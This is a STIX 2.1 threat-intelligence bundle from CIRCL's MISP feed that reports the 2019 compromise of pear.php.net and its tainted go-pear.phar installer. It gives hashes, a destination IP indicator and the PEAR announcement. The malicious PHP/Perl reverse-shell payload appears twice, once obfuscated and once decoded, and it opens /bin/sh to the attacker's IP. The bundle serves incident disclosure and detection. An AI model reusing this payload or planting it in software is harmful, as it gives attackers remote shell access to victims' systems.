misp-circl-feed/feeds/circl/stix-2.1/5c45721d-de08-4fff-b9b0-168a02de0b81.json

216 lines
805 KiB
JSON
Raw Normal View History

2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--5c45721d-de08-4fff-b9b0-168a02de0b81",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-01-24T12:23:06.000Z",
"modified": "2019-01-24T12:23:06.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--5c45721d-de08-4fff-b9b0-168a02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-01-24T12:23:06.000Z",
"modified": "2019-01-24T12:23:06.000Z",
"name": "Incident - pear.php.net - compromised and delivering malicious package",
"published": "2019-01-24T12:24:00Z",
"object_refs": [
"observed-data--5c457328-f3c8-47bd-bfbc-201802de0b81",
"file--5c457328-f3c8-47bd-bfbc-201802de0b81",
"x-misp-attribute--5c49acb8-6624-4506-ba63-4b46950d210f",
"indicator--5c49ae2a-3520-4dbb-bc74-4e04950d210f",
"x-misp-object--5c4572e1-8278-4d63-ba24-196a02de0b81",
"indicator--5c457364-db30-4c64-b462-299e02de0b81",
"malware--5c49ae06-c5a4-4838-a07e-4d35950d210f"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"type:OSINT",
"osint:lifetime=\"perpetual\"",
"osint:certainty=\"50\"",
"circl:incident-classification=\"system-compromise\"",
"ecsirt:intrusions=\"compromised\"",
"europol-incident:information-security=\"unauthorized-access\"",
"europol-incident:information-security=\"unauthorized-modification\"",
"veris:security_incident=\"Confirmed\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5c457328-f3c8-47bd-bfbc-201802de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-01-21T07:22:16.000Z",
"modified": "2019-01-21T07:22:16.000Z",
"first_observed": "2019-01-21T07:22:16Z",
"last_observed": "2019-01-21T07:22:16Z",
"number_observed": 1,
"object_refs": [
"file--5c457328-f3c8-47bd-bfbc-201802de0b81"
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Artifacts dropped\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5c457328-f3c8-47bd-bfbc-201802de0b81",
"hashes": {
"MD5": "1e26d9dd3110af79a9595f1a77a82de7"
}
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5c49acb8-6624-4506-ba63-4b46950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-01-24T12:16:56.000Z",
"modified": "2019-01-24T12:16:56.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Payload delivery\""
],
"x_misp_category": "Payload delivery",
"x_misp_type": "text",
"x_misp_value": "${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"ki\\x72\\x69\\x68\\x71\\x68\"]=\"st\\x72\";${${\"GLOBA\\x4c\\x53\"}[\"k\\x69ri\\x68\\x71\\x68\"]}=\"\\x75\\x73\\x65\\x20\\x53\\x6f\\x63\\x6b\\x65\\x74\\x3b\\x0a\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x73\\x74\\x61\\x72\\x74\\x65\\x64\\x22\\x3b\\x0a\\x24\\x68\\x6f\\x73\\x74\\x20\\x3d\\x20\\x22\\x31\\x30\\x34\\x2e\\x31\\x33\\x31\\x2e\\x31\\x35\\x34\\x2e\\x31\\x35\\x34\\x22\\x3b\\x0a\\x24\\x70\\x6f\\x72\\x74\\x20\\x3d\\x20\\x34\\x34\\x33\\x3b\\x0a\\x24\\x70\\x72\\x6f\\x74\\x6f\\x20\\x3d\\x20\\x67\\x65\\x74\\x70\\x72\\x6f\\x74\\x6f\\x62\\x79\\x6e\\x61\\x6d\\x65\\x28\\x22\\x74\\x63\\x70\\x22\\x29\\x20\\x7c\\x7c\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x73\\x6f\\x63\\x6b\\x65\\x74\\x28\\x53\\x45\\x52\\x56\\x45\\x52\\x2c\\x20\\x50\\x46\\x5f\\x49\\x4e\\x45\\x54\\x2c\\x20\\x53\\x4f\\x43\\x4b\\x5f\\x53\\x54\\x52\\x45\\x41\\x4d\\x2c\\x20\\x24\\x70\\x72\\x6f\\x74\\x6f\\x29\\x20\\x7c\\x7c\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x6d\\x79\\x20\\x24\\x74\\x61\\x72\\x67\\x65\\x74\\x20\\x3d\\x20\\x69\\x6e\\x65\\x74\\x5f\\x61\\x74\\x6f\\x6e\\x28\\x24\\x68\\x6f\\x73\\x74\\x29\\x3b\\x0a\\x69\\x66\\x20\\x28\\x21\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x28\\x53\\x45\\x52\\x56\\x45\\x52\\x2c\\x20\\x70\\x61\\x63\\x6b\\x20\\x22\\x53\\x6e\\x41\\x34\\x78\\x38\\x22\\x2c\\x20\\x32\\x2c\\x20\\x24\\x70\\x6f\\x72\\x74\\x2c\\x20\\x24\\x74\\x61\\x72\\x67\\x65\\x74\\x29\\x29\\x20\\x7b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x6e\\x6f\\x74\\x20\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x65\\x64\\x22\\x3b\\x0a\\x20\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x7d\\x0a\\x69\\x66\\x20\\x28\\x21\\x66\\x6f\\x72\\x6b\\x28\\x20\\x29\\x29\\x20\\x7b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x63\\x68\\x69\\x6c\\x64\\x22\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x49\\x4e\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x4f\\x55\\x54\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x45\\x52\\x52\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x28\\x22\\x65\\x78\\x65\\x63\\x22\\x29\\x3b\\x0a\\x20\\x20\\x65\\x78\\x65\\x63\\x20\\x7b\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x22\\x7d\\x20\\x22\\x2d\\x62\\x61\\x73\\x68\\x22\\x20\\x2e\\x20\\x22\\\\0\\x22\\x20\\x78\\x20\\x34\\x3b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x28\\x22\\x65\\x78\\x69\\x74\\x22\\x29\\x3b\\x0a\\x20\\x20\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x3b\\x0a\\x7d\";@exec(\"p\\x65\\x72\\x6c -e \\x27$str\\x27 \\x3e /dev/n\\x75ll\\x202\\x3e/de\\x76/\\x6e\\x75\\x6c\\x6c\");"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5c49ae2a-3520-4dbb-bc74-4e04950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-01-24T12:23:06.000Z",
"modified": "2019-01-24T12:23:06.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '104.131.154.154']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-01-24T12:23:06Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5c4572e1-8278-4d63-ba24-196a02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-01-21T07:44:57.000Z",
"modified": "2019-01-21T07:44:57.000Z",
"labels": [
"misp:name=\"microblog\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "post",
"value": "A security breach has been found on the http://pear.php.net webserver, with a tainted go-pear.phar discovered. The PEAR website itself has been disabled until a known clean site can be rebuilt. A more detailed announcement will be on the PEAR Blog once it's back online.",
"category": "Other",
"uuid": "5c4572e1-5ae8-49cf-b341-196a02de0b81"
},
{
"type": "text",
"object_relation": "type",
"value": "Twitter",
"category": "Other",
"uuid": "5c4572e2-39b0-4a44-815e-196a02de0b81"
},
{
"type": "link",
"object_relation": "link",
"value": "https://twitter.com/pear/status/1086634389465956352",
"category": "External analysis",
"uuid": "5c4572e2-6650-4473-bb22-196a02de0b81"
},
{
"type": "text",
"object_relation": "username",
"value": "pear",
"category": "Other",
"uuid": "5c4572e2-5a7c-47bd-93db-196a02de0b81"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "microblog"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5c457364-db30-4c64-b462-299e02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-01-21T07:23:16.000Z",
"modified": "2019-01-21T07:23:16.000Z",
"pattern": "[file:hashes.MD5 = '1e26d9dd3110af79a9595f1a77a82de7' AND file:hashes.SHA1 = '5b913edb2917d6b85d929659ff833e401a5cc503' AND file:hashes.SHA256 = 'f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8' AND file:name = 'f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8' AND file:size = '3604833' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-01-21T07:23:16Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "malware",
"spec_version": "2.1",
"id": "malware--5c49ae06-c5a4-4838-a07e-4d35950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-01-24T12:22:30.000Z",
"modified": "2019-01-24T12:22:30.000Z",
"is_family": false,
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "misc"
}
],
"implementation_languages": [
"PHP"
],
"labels": [
"misp:name=\"script\"",
"misp:meta-category=\"misc\"",
"misp:to_ids=\"False\""
],
"x_misp_script": "${\"GLOBALS\"}[\"kirihqh\"]=\"str\";${${\"GLOBALS\"}[\"kirihqh\"]}=\"use Socket;\r\nprint \"started\";\r\n$host = \"104.131.154.154\";\r\n$port = 443;\r\n$proto = getprotobyname(\"tcp\") || \r\nsocket(SERVER, PF_INET, SOCK_STREAM, $proto) || \r\nmy $target = inet_aton($host);\r\nif (!connect(SERVER, pack \"SnA4x8\", 2, $port, $target)) {\r\n print \"not connected\";\r\n \r\n}\r\nif (!fork( )) {\r\n print \"child\";\r\n open(STDIN,\">&SERVER\");\r\n open(STDOUT,\">&SERVER\");\r\n open(STDERR,\">&SERVER\");\r\n print(\"exec\");\r\n exec {\"/bin/sh\"} \"-bash\\\\0\" x 4;\r\n print(\"exit\");\r\n \r\n}\";@exec(\"perl -e '$str' > /dev/null 2>/dev/null\");",
"x_misp_state": "Malicious"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}